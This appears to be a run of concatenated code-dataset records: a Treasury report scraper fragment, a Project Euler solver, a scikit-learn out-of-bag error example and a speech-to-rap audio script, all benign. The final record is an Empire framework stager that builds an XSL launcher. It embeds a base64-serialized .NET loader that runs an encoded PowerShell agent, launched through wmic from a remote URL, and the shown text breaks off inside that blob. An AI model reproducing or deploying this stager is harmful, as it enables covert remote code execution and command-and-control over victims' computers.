unreleased if landing_url: report['landing_url'] = landing_url return report def report_from(result, page_url, report_type, year_range): try: title, date1, date2 = result.text.rsplit(",", 2) published_on_text = date1 + date2 published_on = datetime.datetime.strptime(published_on_text.strip(), '%B %d %Y') except ValueError: try: title, date1, date2, date3 = result.text.rsplit(maxsplit=3) published_on_text = date1 + date2 + date3 published_on = datetime.datetime.strptime(published_on_text.strip(), '%B%d,%Y') except ValueError: title = result.text published_on = None title = clean_text(title) original_title = title report_id, title = title.split(maxsplit=1) report_id = report_id.rstrip(":") if result.name == "a": link = result else: link = result.a report_url = urljoin(page_url, link['href']) # HTTPS, even if they haven't updated their links yet report_url = re.sub("^http://www.treasury.gov", "https://www.treasury.gov", report_url) if report_id.find('-') == -1: # If the first word of the text doesn't contain a hyphen, # then it's probably part of the title, and not a tracking number. # In this case, fall back to the URL. report_filename = report_url.split("/")[-1] report_id, extension = os.path.splitext(report_filename) report_id = unquote(report_id) # Reset the title, since we previously stripped off the first word # as a candidate report_id. title = original_title if report_id in REPORT_PUBLISHED_MAP: published_on = REPORT_PUBLISHED_MAP[report_id] if not published_on: admin.log_no_date("treasury", report_id, title, report_url) return # Skip this report, it already shows up under other audit reports if report_id == "Role of Non-Career Officials in Treasury FOIA Processing": return if published_on.year not in year_range: logging.debug("[%s] Skipping, not in requested range." 
% report_url) return report = { 'inspector': 'treasury', 'inspector_url': 'https://www.treasury.gov/about/organizational-structure/ig/', 'agency': 'treasury', 'agency_name': "Department of the Treasury", 'type': report_type, 'report_id': report_id, 'url': report_url, 'title': title, 'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"), } return report def semiannual_report_from(result, page_url, year_range): published_on_text = clean_text(result.text) published_on = datetime.datetime.strptime(published_on_text.strip(), '%B %d, %Y') title = "Semiannual Report - {}".format(published_on_text) report_url = urljoin(page_url, result['href']) # HTTPS, even if they haven't updated their links yet report_url = re.sub("^http://www.treasury.gov", "https://www.treasury.gov", report_url) report_filename = report_url.split("/")[-1] report_id, extension = os.path.splitext(report_filename) report_id = unquote(report_id) if published_on.year not in year_range: logging.debug("[%s] Skipping, not in requested range." % report_url) return report = { 'inspector': 'treasury', 'inspector_url': 'https://www.treasury.gov/about/organizational-structure/ig/', 'agency': 'treasury', 'agency_name': "Department of the Treasury", 'type': 'semiannual_report', 'report_id': report_id, 'url': report_url, 'title': title, 'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"), } return report utils.run(run) if (__name__ == "__main__") else None
cc0-1.0
3,522,391,499,883,024,000
37.255051
204
0.676678
false
3.169247
false
false
false
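SUMMARY_RE above does the heavy lifting of splitting an index entry into a report ID and a title. A quick demonstration (the sample string is invented; the pattern is copied verbatim from the scraper):
import re

SUMMARY_RE = re.compile("(OIG|OIG-CA|EVAL) *-? *([0-9]+) *- *([0-9R]+) *[:,]? +([^ ].*)")

m = SUMMARY_RE.match("OIG-14-049: Audit of the Fiscal Service")
print(m.expand(r"\1-\2-\3"))  # OIG-14-049
print(m.group(4))             # Audit of the Fiscal Service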
Igglyboo/Project-Euler
1-99/30-39/Problem35.py
1
1086
from time import clock def timer(function): def wrapper(*args, **kwargs): start = clock() print(function(*args, **kwargs)) print("Solution took: %f seconds." % (clock() - start)) return wrapper @timer def find_answer(): total = 0 primes = sieve(1000000) primes.remove(0) for prime in primes: p_str = list(str(prime)) p_str.append(p_str.pop(0)) for i in range(len(p_str) - 1): current = int(''.join(x for x in p_str)) if current not in primes: break p_str.append(p_str.pop(0)) else: total += 1 return total def sieve(upperlimit): l = list(range(2, upperlimit + 1)) # Do p = 2 first so we can change step size to 2*p below for i in range(4, upperlimit + 1, 2): l[i - 2] = 0 for p in l: if p ** 2 > upperlimit: break elif p: for i in range(p * p, upperlimit + 1, 2 * p): l[i - 2] = 0 return set(l) if __name__ == "__main__": find_answer()
unlicense
2,629,917,463,131,232,000
20.294118
63
0.503683
false
3.372671
false
false
false
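The rotate-and-test loop in find_answer can also be written with string slicing. A sketch reusing the sieve() defined above (the published answer to Project Euler 35 is 55):
def is_circular_prime(p, primes):
    # True when every rotation of p's digits is also in the prime set.
    s = str(p)
    return all(int(s[i:] + s[:i]) in primes for i in range(len(s)))

primes = sieve(1000000)  # the set also holds 0 for crossed-out slots; filtered below
print(sum(1 for p in primes if p and is_circular_prime(p, primes)))  # 55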
karstenw/nodebox-pyobjc
examples/Extended Application/sklearn/examples/ensemble/plot_ensemble_oob.py
1
4073
""" ============================= OOB Errors for Random Forests ============================= The ``RandomForestClassifier`` is trained using *bootstrap aggregation*, where each new tree is fit from a bootstrap sample of the training observations :math:`z_i = (x_i, y_i)`. The *out-of-bag* (OOB) error is the average error for each :math:`z_i` calculated using predictions from the trees that do not contain :math:`z_i` in their respective bootstrap sample. This allows the ``RandomForestClassifier`` to be fit and validated whilst being trained [1]. The example below demonstrates how the OOB error can be measured at the addition of each new tree during training. The resulting plot allows a practitioner to approximate a suitable value of ``n_estimators`` at which the error stabilizes. .. [1] T. Hastie, R. Tibshirani and J. Friedman, "Elements of Statistical Learning Ed. 2", p592-593, Springer, 2009. """ import matplotlib.pyplot as plt from collections import OrderedDict from sklearn.datasets import make_classification from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier # Author: Kian Ho <hui.kian.ho@gmail.com> # Gilles Louppe <g.louppe@gmail.com> # Andreas Mueller <amueller@ais.uni-bonn.de> # # License: BSD 3 Clause # nodebox section if __name__ == '__builtin__': # were in nodebox import os import tempfile W = 800 inset = 20 size(W, 600) plt.cla() plt.clf() plt.close('all') def tempimage(): fob = tempfile.NamedTemporaryFile(mode='w+b', suffix='.png', delete=False) fname = fob.name fob.close() return fname imgx = 20 imgy = 0 def pltshow(plt, dpi=150): global imgx, imgy temppath = tempimage() plt.savefig(temppath, dpi=dpi) dx,dy = imagesize(temppath) w = min(W,dx) image(temppath,imgx,imgy,width=w) imgy = imgy + dy + 20 os.remove(temppath) size(W, HEIGHT+dy+40) else: def pltshow(mplpyplot): mplpyplot.show() # nodebox section end print(__doc__) RANDOM_STATE = 123 # Generate a binary classification dataset. X, y = make_classification(n_samples=500, n_features=25, n_clusters_per_class=1, n_informative=15, random_state=RANDOM_STATE) # NOTE: Setting the `warm_start` construction parameter to `True` disables # support for parallelized ensembles but is necessary for tracking the OOB # error trajectory during training. ensemble_clfs = [ ("RandomForestClassifier, max_features='sqrt'", RandomForestClassifier(warm_start=True, oob_score=True, max_features="sqrt", random_state=RANDOM_STATE)), ("RandomForestClassifier, max_features='log2'", RandomForestClassifier(warm_start=True, max_features='log2', oob_score=True, random_state=RANDOM_STATE)), ("RandomForestClassifier, max_features=None", RandomForestClassifier(warm_start=True, max_features=None, oob_score=True, random_state=RANDOM_STATE)) ] # Map a classifier name to a list of (<n_estimators>, <error rate>) pairs. error_rate = OrderedDict((label, []) for label, _ in ensemble_clfs) # Range of `n_estimators` values to explore. min_estimators = 15 max_estimators = 175 for label, clf in ensemble_clfs: for i in range(min_estimators, max_estimators + 1): clf.set_params(n_estimators=i) clf.fit(X, y) # Record the OOB error for each `n_estimators=i` setting. oob_error = 1 - clf.oob_score_ error_rate[label].append((i, oob_error)) # Generate the "OOB error rate" vs. "n_estimators" plot. for label, clf_err in error_rate.items(): xs, ys = zip(*clf_err) plt.plot(xs, ys, label=label) plt.xlim(min_estimators, max_estimators) plt.xlabel("n_estimators") plt.ylabel("OOB error rate") plt.legend(loc="upper right") # plt.show() pltshow(plt)
mit
7,607,601,848,409,383,000
32.385246
82
0.64056
false
3.569676
false
false
false
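Stripped of the NodeBox plumbing and the warm_start sweep, the OOB measurement itself is a single attribute read after fitting. A minimal sketch with a similar dataset:
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier

X, y = make_classification(n_samples=500, n_features=25,
                           n_informative=15, random_state=123)
clf = RandomForestClassifier(n_estimators=100, oob_score=True,
                             random_state=123)
clf.fit(X, y)
print("OOB error rate: %.3f" % (1 - clf.oob_score_))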
ruofengchen/mc-hawking
rap_gen.py
1
6438
import subprocess from numpy import * from scipy import * import wave import scipy.io.wavfile import scipy.signal import random import pylab import pdb '''By Ruofeng Chen, April 2013''' voices = ["Albert", "Bad News", "Bahh", "Bells", "Boing", "Bubbles", "Cellos", "Deranged", "Good News", "Hysterical", "Pipe Organ", "Trinoids", "Whisper", "Zarvox"] pulses = {} pulses[1] = [0] pulses[2] = [0, 4] pulses[3] = [0, 4, 8] pulses[4] = [12, 16, 20, 24] pulses[5] = [8, 12, 16, 20, 24] pulses[6] = [6, 8, 12, 16, 20, 24] pulses[7] = [6, 8, 10, 12, 22, 24, 28] pulses[8] = [6, 8, 10, 12, 22, 24, 26, 28] pulses[9] = [6, 8, 10, 12, 16, 20, 24, 26, 28] pulses[10] = [4, 6, 8, 10, 12, 16, 20, 24, 26, 28] pulses[11] = [4, 6, 8, 10, 12, 16, 18, 20, 24, 26, 28] pulses[12] = [4, 6, 8, 10, 12, 16, 18, 20, 22, 24, 26, 28] pulses[13] = [2, 4, 6, 8, 10, 12, 16, 18, 20, 22, 24, 26, 28] pulses[14] = [0, 2, 4, 6, 8, 10, 12, 16, 18, 20, 22, 24, 26, 28] pulses[15] = [0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28] pulses[16] = [0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30] # ratios = [1, 1.1, 1.2, 1.1, 1, 1.1, 1.2, 1.1, 1, 1.1, 1.2, 1.1, 1, 1.1, 1.2, 1.1] synth_path = "./synth" rap_path = "./rap" def time_stretch_half(dafxin): '''''' hopsize = 480 # sounds good using this parameter framesize = 2 * hopsize hannWin = hanning(framesize) framenum = dafxin.size / hopsize - 1 dafxout = zeros(hopsize*(framenum/2)+framesize) for n in range(framenum): if n % 2 == 0: dafxout[n/2*hopsize:n/2*hopsize+framesize] = dafxout[n/2*hopsize:n/2*hopsize+framesize] + dafxin[n*hopsize:n*hopsize+framesize] * hannWin return dafxout def synth(words, voice="Fred"): for word in words: fullcmd = ['say', '-v', voice, '-o', synth_path+'/'+str(hash(word))+'.wav', '--data-format=LEI16@44100', word] subprocess.check_output(fullcmd) def align_to_beats(everything): ''' YO YO ''' tempo = 140 intvl = 0.25 / (tempo / 60.) * 44100. total_len = 8 / (tempo / 60.) * 44100. data_list = [] for tup in everything: for i in range(len(tup[1])): data_list.append(tup[0][tup[1][i]:tup[2][i]]) fs, rapdata = scipy.io.wavfile.read(open('drum_1bar.wav', 'r')) rapdata = float32(rapdata / float(2**16)) rapdata = mean(rapdata, 1) rapdata = rapdata * 0.2 # rapdata = zeros(total_len * 1.5) # if you don't want accompaniment total_voice_len = sum([data.size for data in data_list]) syllable_num = len(data_list) if syllable_num > 16: syllable_num = 16 # this will result in overlapping words pulse = pulses[syllable_num] for s in range(syllable_num): start = pulse[s] * intvl if s < syllable_num - 1 and data_list[s].size > 1.5 * (pulse[s+1] - pulse[s]) * intvl: data_list[s] = time_stretch_half(data_list[s]) if s == 0: rapdata[start:start+data_list[s].size] = rapdata[start:start+data_list[s].size] + data_list[s] * 2. 
elif pulse[s] % 4 == 0: rapdata[start:start+data_list[s].size] = rapdata[start:start+data_list[s].size] + data_list[s] * 1.2 else: rapdata[start:start+data_list[s].size] = rapdata[start:start+data_list[s].size] + data_list[s] # pylab.plot(rapdata) # pylab.show() # delete the tailing zeros first_zero = rapdata.size-1 while rapdata[first_zero] == 0: first_zero = first_zero - 1 rapdata = rapdata[0:first_zero] # delete the heading few samples rapdata = rapdata[0.2*44100:-1] rapdata = rapdata / max(abs(rapdata)) * 0.4 rapdata = array(rapdata * float(2**16), dtype=int16) return rapdata def find_onsets_and_offsets(data): th = 0 hopsize = 512 framenum = data.size / hopsize # find all onsets energy0 = 0 onsets = [] offsets = [] for n in range(framenum): energy1 = sum(data[n*hopsize:(n+1)*hopsize] ** 2) / hopsize if energy0 <= th and energy1 > th: ind = n*hopsize onsets.append(ind) # from this onset on, find its corresponding offset n2 = n energy2 = energy1 while (n2+1)*hopsize <= data.size and energy2 > th: energy2 = sum(data[n2*hopsize:(n2+1)*hopsize] ** 2) / hopsize n2 = n2 + 1 if (n2+1)*hopsize > data.size: offsets.append(data.size-1) else: offsets.append(n2*hopsize) energy0 = energy1 if len(onsets) != len(offsets): print "Big problem!!! Onsets != Offsets" # for all words that are too short, merge them with the shorter neighbor if len(onsets) > 1: while True: short_count = 0 for i in range(len(onsets)): if offsets[i] - onsets[i] < 44100 * 0.2: short_count = short_count + 1 if short_count == 0: break for i in range(len(onsets)): if offsets[i] - onsets[i] < 44100 * 0.2: if i >= 1 and i <= len(onsets)-2: if offsets[i-1] - onsets[i-1] < offsets[i+1] - onsets[i+1]: onsets.pop(i) offsets.pop(i-1) else: onsets.pop(i+1) offsets.pop(i) elif i == 0: onsets.pop(i+1) offsets.pop(i) else: onsets.pop(i) offsets.pop(i-1) break return array(onsets, int), array(offsets, int) def from_text_to_wavfile(sentence): words = sentence.split(" ") synth(words) everything = [] for word in words: fs, data = scipy.io.wavfile.read(open(synth_path+'/'+str(hash(word))+'.wav', 'r')) data = float32(data / float(2**16)) if fs != 44100: print "warning: fs is not 44100!!!!!!" onsets, offsets = find_onsets_and_offsets(data) everything.append((data, onsets, offsets)) rapdata = align_to_beats(everything) scipy.io.wavfile.write(rap_path+'/'+str(hash(sentence))+'-rap.wav', 44100, rapdata) if __name__ == '__main__': # generate the audio sentence = '''thank you so much for coming tonight''' from_text_to_wavfile(sentence)
gpl-2.0
5,563,728,229,412,827,000
34.373626
164
0.540385
false
2.82989
false
false
false
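time_stretch_half above relies on Hann windows at 50% overlap summing to (nearly) a constant, so overlap-adding every other analysis frame halves the duration without audible amplitude ripple. A sketch of that identity with the same hop and frame sizes:
import numpy as np

hopsize = 480
framesize = 2 * hopsize
w = np.hanning(framesize)
# Adjacent output frames overlap by one hop; the two windows sum to ~1 there.
overlap = w[:hopsize] + w[hopsize:]
print(overlap.min(), overlap.max())  # both values are close to 1.0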
Hackplayers/Empire-mod-Hackplayers
lib/stagers/windows/starfighters_xsl.py
1
61839
from lib.common import helpers from termcolor import colored class Stager: def __init__(self, mainMenu, params=[]): self.info = { 'Name': 'XSL Launcher StarFighter', 'Author': ['@CyberVaca'], 'Description': ('Generates a .xsl launcher for Empire.'), 'Comments': [ 'wmic process get brief /format:"http://10.10.10.10/launcher.xsl"' ] } # any options needed by the stager, settable during runtime self.options = { # format: # value_name : {description, required, default_value} 'Listener': { 'Description': 'Listener to generate stager for.', 'Required': True, 'Value': '' }, 'Language' : { 'Description' : 'Language of the stager to generate.', 'Required' : True, 'Value' : 'powershell' }, 'StagerRetries': { 'Description': 'Times for the stager to retry connecting.', 'Required': False, 'Value': '0' }, 'Base64' : { 'Description' : 'Switch. Base64 encode the output.', 'Required' : True, 'Value' : 'True' }, 'Obfuscate' : { 'Description' : 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.', 'Required' : False, 'Value' : 'False' }, 'ObfuscateCommand' : { 'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.', 'Required' : False, 'Value' : r'Token\All\1,Launcher\STDIN++\12467' }, 'OutFile': { 'Description': 'File to output XSL to, otherwise displayed on the screen.', 'Required': False, 'Value': '/tmp/launcher.xsl' }, 'UserAgent': { 'Description': 'User-agent string to use for the staging request (default, none, or other).', 'Required': False, 'Value': 'default' }, 'Proxy': { 'Description': 'Proxy to use for request (default, none, or other).', 'Required': False, 'Value': 'default' }, 'ProxyCreds': { 'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', 'Required': False, 'Value': 'default' } } # save off a copy of the mainMenu object to access external functionality # like listeners/agent handlers/etc. self.mainMenu = mainMenu for param in params: # parameter format is [Name, Value] option, value = param if option in self.options: self.options[option]['Value'] = value def generate(self): # extract all of our options language = self.options['Language']['Value'] listenerName = self.options['Listener']['Value'] base64 = self.options['Base64']['Value'] obfuscate = self.options['Obfuscate']['Value'] obfuscateCommand = self.options['ObfuscateCommand']['Value'] userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] stagerRetries = self.options['StagerRetries']['Value'] encode = False if base64.lower() == "true": encode = True obfuscateScript = False if obfuscate.lower() == "true": obfuscateScript = True # generate the launcher code launcher = self.mainMenu.stagers.generate_launcher( listenerName, language=language, encode=encode, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries) launcher = launcher.replace("powershell -noP -sta -w 1 -enc ","") if launcher == "": print helpers.color("[!] 
Error in launcher command generation.") return "" else: code = """<?xml version='1.0'?> <stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0"> <output method="text"/> <ms:script implements-prefix="user" language="JScript"> <![CDATA[ """ code +="var EncodedPayload = \"" + launcher + "\"\n" code += """ /* Then run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer. */ function setversion() { } function debug(s) {} function base64ToStream(b) { var enc = new ActiveXObject("System.Text.ASCIIEncoding"); var length = enc.GetByteCount_2(b); var ba = enc.GetBytes_4(b); var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); ba = transform.TransformFinalBlock(ba, 0, length); var ms = new ActiveXObject("System.IO.MemoryStream"); ms.Write(ba, 0, (length / 4) * 3); ms.Position = 0; return ms; } var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+ "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+ "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+ "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+ "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+ "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+ "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+ "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+ "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+ "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+ "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+ "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+ "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+ "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+ "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+ "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+ "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+ "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+ "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+ "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+ "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+ "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAHoAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+ "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAIvEzWQAAAAAA"+ "AAAA4AAiIAsBMAAAcgAAAAYAAAAAAADGkQAAACAAAACgAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+ "AAAAAAAAAOAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAdJEA"+ "AE8AAAAAoAAAiAMAAAAAAAAAAAAAAAAAAAAAAAAAwAAADAAAADyQAAAcAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+ "AAAALnRleHQAAADMcQAAACAAAAByAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAiAMAAACg"+ "AAAABAAAAHQAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAwAAAAAIAAAB4AAAAAAAAAAAA"+ "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAKiRAAAAAAAASAAAAAIABQBIPQAA9FIAAAEAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzACAB4AAAAB"+ 
"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"+ 
